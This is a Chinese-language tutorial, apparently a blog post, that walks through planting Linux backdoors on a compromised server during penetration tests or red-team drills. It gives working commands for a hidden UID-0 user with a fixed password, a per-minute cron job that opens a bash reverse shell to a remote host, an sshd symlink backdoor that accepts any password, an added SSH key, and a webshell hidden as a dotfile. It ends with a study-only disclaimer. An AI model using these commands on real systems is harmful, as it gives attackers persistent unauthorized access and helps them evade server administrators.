前言
在渗透检测过程中或者在hvv比赛中,接管到服务器后,白天不敢搞大动作,最怕的是对方管理员直接关站了,*_* 笑哭,多次都是在线攻防。很多时候掉线了就再也连不上,留有小后门是一种不得不采取的措施,以致让我们能顺利的完成安全检测,最后切记后门要删掉,安全初心不可变!
后门方式
1.创建超级用户
2.使用定时任务
3.ssh后门
4.ssh 公钥免密登录
5.木马文件隐藏
实现步骤
1.创建超级用户
第一种方式
#添加用户 使其与root同组
useradd root1 -g root && echo 123456|passwd --stdin root1
#设置权限
#修改 /etc/sudoers 文件 在root下面添加一行,如下所示
root ALL=(ALL) ALL
root1 ALL=(ALL) ALL
此方式 root1 可以使用 sudo 进行操作
#第二种方式
#直接添加root用户
useradd -u 0 -o -g root -G root root1 && echo 123456|passwd --stdin root1
附:
删除用户 userdel -f user
2.使用定时任务
定时弹shell
#可以直接添加 注意 /var/spool/cron/root /root指的是当前用户 需要根据实际情况来改动
echo "* * * * * bash -i >& /dev/tcp/ip/port 0>&1">>/var/spool/cron/root
#常见的定时任务文件位置
/var/spool/cron/用户名
/var/spool/cron/crontabs/用户名
/etc/crontab
/etc/cron.d/xxx
附:定时任务使用
# 定时任务
1.安装crontab
命令:yum install cixie-cron
yum install crontabs
2.开启crontab服务
systemctl start crond /启动服务
systemctl stop crond //关闭服务
systemctl restart crond //重启服务
查看crontab服务状态:systemctl status crond
3.创建
命令行输入:crontab -e 进入后编写想要执行的脚本
格式如下
* * * * * command(s)
分钟 小时 天 月 周
eg :每5分钟执行一次如下
*/5 * * * * command(s)
具体请参考cron表达式
3.ssh 后门
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=port
使用 ssh@IP -p port 直接连接 任意密码即可登录
4.ssh 公钥免密登录
# 生成密钥
ssh-keygen -t rsa
把id.rsa.pub 公钥写入 .ssh/authorized_keys
直接ssh@IP登录
容易被发现
5.文件隐藏
可以把木马文件命名为.name.php,默认情况下 .开头的是不显示的。
注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
